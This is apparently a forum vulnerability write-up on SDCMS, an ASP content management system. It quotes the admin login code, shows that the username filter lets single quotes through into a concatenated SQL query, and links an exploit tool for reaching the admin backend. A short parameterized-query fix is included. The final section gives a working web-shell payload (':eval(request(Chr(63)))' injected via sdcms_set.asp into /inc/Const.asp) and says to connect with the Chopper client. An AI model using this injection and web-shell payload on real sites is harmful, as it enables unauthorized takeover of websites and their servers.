Author: T00LS 鬼哥
Vulnerable file: [admin directory]/index.asp

Sub Check
    Dim username,password,code,getcode,Rs
    IF Check_post Then Echo "1禁止从外部提交数据!":Exit Sub
    username=FilterText(Trim(Request.Form("username")),1)
    password=FilterText(Trim(Request.Form("password")),1)
    code=Trim(Request.Form("yzm"))
    getcode=Session("SDCMSCode")
    IF errnum>=loginnum Then Echo "系统已禁止您今日再登录":Died
    IF code="" Then Alert "验证码不能为空!","javascript:history.go(-1)":Died
    IF code<>"" And Not Isnumeric(code) Then Alert "验证码必须为数字!","javascript:history.go(-1)":Died
    IF code<>getcode Then Alert "验证码错误!","javascript:history.go(-1)":Died
    IF username="" or password="" Then
        Echo "用户名或密码不能为空":Died
    Else
        'username and the md5 hash are concatenated straight into the SQL string
        Set Rs=Conn.Execute("Select Id,Sdcms_Name,Sdcms_Pwd,isadmin,alllever,infolever From Sd_Admin Where Sdcms_name='"&username&"' And Sdcms_Pwd='"&md5(password)&"'")
        IF Rs.Eof Then
            AddLog username,GetIp,"登录失败",1
            Echo "用户名或密码错误,今日还有 "&loginnum-errnum&" 次机会"
        Else
            Add_Cookies "sdcms_id",Rs(0)
            Add_Cookies "sdcms_name",username
            Add_Cookies "sdcms_pwd",Rs(2)
            Add_Cookies "sdcms_admin",Rs(3)
            Add_Cookies "sdcms_alllever",Rs(4)
            Add_Cookies "sdcms_infolever",Rs(5)
            Conn.Execute("Update Sd_Admin Set logintimes=logintimes+1,LastIp='"&GetIp&"' Where id="&Rs(0)&"")
            AddLog username,GetIp,"登录成功",1
            'Automatically delete log records older than 30 days
            IF Sdcms_DataType Then
                Conn.Execute("Delete From Sd_Log Where DateDiff('d',adddate,Now())>30")
            Else
                Conn.Execute("Delete From Sd_Log Where DateDiff(d,adddate,GetDate())>30")
            End IF
            Go("sdcms_index.asp")
        End IF
        Rs.Close
        Set Rs=Nothing
    End IF
End Sub

We can see that username is filtered through FilterText. Let's look at the FilterText code:

Function FilterText(ByVal t0,ByVal t1)
    IF Len(t0)=0 Or IsNull(t0) Or IsArray(t0) Then FilterText="":Exit Function
    t0=Trim(t0)
    Select Case t1
        Case "1"
            'mode 1: only whitespace is touched
            t0=Replace(t0,Chr(32),"")
            t0=Replace(t0,Chr(13),"")
            t0=Replace(t0,Chr(10)&Chr(10),"")
            t0=Replace(t0,Chr(10),"")
        Case "2"
            'mode 2: strip control characters and punctuation
            t0=Replace(t0,Chr(8),"")'backspace
            t0=Replace(t0,Chr(9),"")'tab (horizontal tab)
            t0=Replace(t0,Chr(10),"")'line feed
            t0=Replace(t0,Chr(11),"")'vertical tab
            t0=Replace(t0,Chr(12),"")'form feed
            t0=Replace(t0,Chr(13),"")'carriage return; chr(13)&chr(10) is the CR+LF pair
            t0=Replace(t0,Chr(22),"")
            t0=Replace(t0,Chr(32),"")'space
            t0=Replace(t0,Chr(33),"")'!
            t0=Replace(t0,Chr(34),"")'"
            t0=Replace(t0,Chr(35),"")'#
            t0=Replace(t0,Chr(36),"")'$
            t0=Replace(t0,Chr(37),"")'%
            t0=Replace(t0,Chr(38),"")'&
            t0=Replace(t0,Chr(39),"")''
            t0=Replace(t0,Chr(40),"")'(
            t0=Replace(t0,Chr(41),"")')
            t0=Replace(t0,Chr(42),"")'*
            t0=Replace(t0,Chr(43),"")'+
            t0=Replace(t0,Chr(44),"")',
            t0=Replace(t0,Chr(45),"")'-
            t0=Replace(t0,Chr(46),"")'.
            t0=Replace(t0,Chr(47),"")'/
            t0=Replace(t0,Chr(58),"")':
            t0=Replace(t0,Chr(59),"")';
            t0=Replace(t0,Chr(60),"")'<
            t0=Replace(t0,Chr(61),"")'=
            t0=Replace(t0,Chr(62),"")'>
            t0=Replace(t0,Chr(63),"")'?
            t0=Replace(t0,Chr(64),"")'@
            t0=Replace(t0,Chr(91),"")'[
            t0=Replace(t0,Chr(92),"")'\
            t0=Replace(t0,Chr(93),"")']
            t0=Replace(t0,Chr(94),"")'^
            t0=Replace(t0,Chr(95),"")'_
            t0=Replace(t0,Chr(96),"")'`
            t0=Replace(t0,Chr(123),"")'{
            t0=Replace(t0,Chr(124),"")'|
            t0=Replace(t0,Chr(125),"")'}
            t0=Replace(t0,Chr(126),"")'~
        Case Else
            'any other mode: HTML-encode the special characters
            t0=Replace(t0, "&", "&amp;")
            t0=Replace(t0, "'", "&#39;")
            t0=Replace(t0, """", "&quot;")
            t0=Replace(t0, "<", "&lt;")
            t0=Replace(t0, ">", "&gt;")
    End Select
    IF Instr(Lcase(t0),"expression")>0 Then
        'breaks the CSS expression() keyword
        t0=Replace(t0,"expression","e­xpression", 1, -1, 0)
    End If
    FilterText=t0
End Function

See? With parameter 1 it only strips the following:

    t0=Replace(t0,Chr(32)," ")
    t0=Replace(t0,Chr(13),"")
    t0=Replace(t0,Chr(10)&Chr(10),"")
    t0=Replace(t0,Chr(10),"")

Spaces, carriage returns and line feeds are handled, but the single quote (Chr(39)) passes through untouched and is then concatenated straight into the Select on Sd_Admin, so the login query is SQL-injectable. The vulnerability lets you obtain the admin account and password directly. The default SDCMS admin path is /admin/; if the site owner changed the admin path, you will have to find it yourself!
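As an added example (not SDCMS's own code), this is the same admin lookup as in Sub Check, rewritten with bound ADODB parameters, which is the fix for the concatenated login query above. It assumes an open ADODB.Connection in Conn and the page's md5() function; the column sizes (50 for the name, 32 for the hash) and the allow-list pattern are assumptions.

```vbscript
' Added example, not SDCMS's own code: the admin lookup from Sub Check with
' username and password hash bound as ADODB parameters instead of being
' concatenated into the SQL string. Assumes an open ADODB.Connection in Conn
' and the page's md5() function; column sizes 50/32 are assumptions.
Const adCmdText = 1
Const adVarChar = 200
Const adParamInput = 1

' Defence in depth: an admin name that is not plain word characters is
' rejected before it reaches the database (the pattern is an assumption).
Function IsSafeAdminName(s)
    Dim re
    Set re = New RegExp
    re.Pattern = "^[A-Za-z0-9_]{1,50}$"
    IsSafeAdminName = re.Test(s)
End Function

' Returns a Recordset positioned on the matching admin row, or Nothing
' when the name fails the allow-list check.
Function FindAdmin(Conn, username, password)
    Dim Cmd
    Set FindAdmin = Nothing
    If Not IsSafeAdminName(username) Then Exit Function
    Set Cmd = Server.CreateObject("ADODB.Command")
    Set Cmd.ActiveConnection = Conn
    Cmd.CommandType = adCmdText
    ' The ? placeholders are filled in by the provider; a quote inside a
    ' value stays data and can no longer terminate the string literal.
    Cmd.CommandText = "Select Id,Sdcms_Name,Sdcms_Pwd,isadmin,alllever,infolever " & _
                      "From Sd_Admin Where Sdcms_name=? And Sdcms_Pwd=?"
    Cmd.Parameters.Append Cmd.CreateParameter("name", adVarChar, adParamInput, 50, username)
    Cmd.Parameters.Append Cmd.CreateParameter("pwd", adVarChar, adParamInput, 32, md5(password))
    Set FindAdmin = Cmd.Execute
End Function
```

In Sub Check the Conn.Execute("Select ...") line would become Set Rs=FindAdmin(Conn,username,password), with a Nothing result treated the same way as Rs.Eof.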

Exploit tool download (this tool only runs on XP): sdcms-EXP

Test:

Now enter the captcha shown in the tool, then click OK.

See, we went straight into the admin management interface, heh!

And just like that we're in the backend....

SDCMS privilege escalation:

Method 1: visit /[admin directory]/sdcms_set.asp and append “:eval(request(Chr(63)))’ after the site name field; that writes a one-line shell directly. It is written into /inc/Const.asp, and the one-line shell's connection password is ?

OK, now connect with Chopper (菜刀)!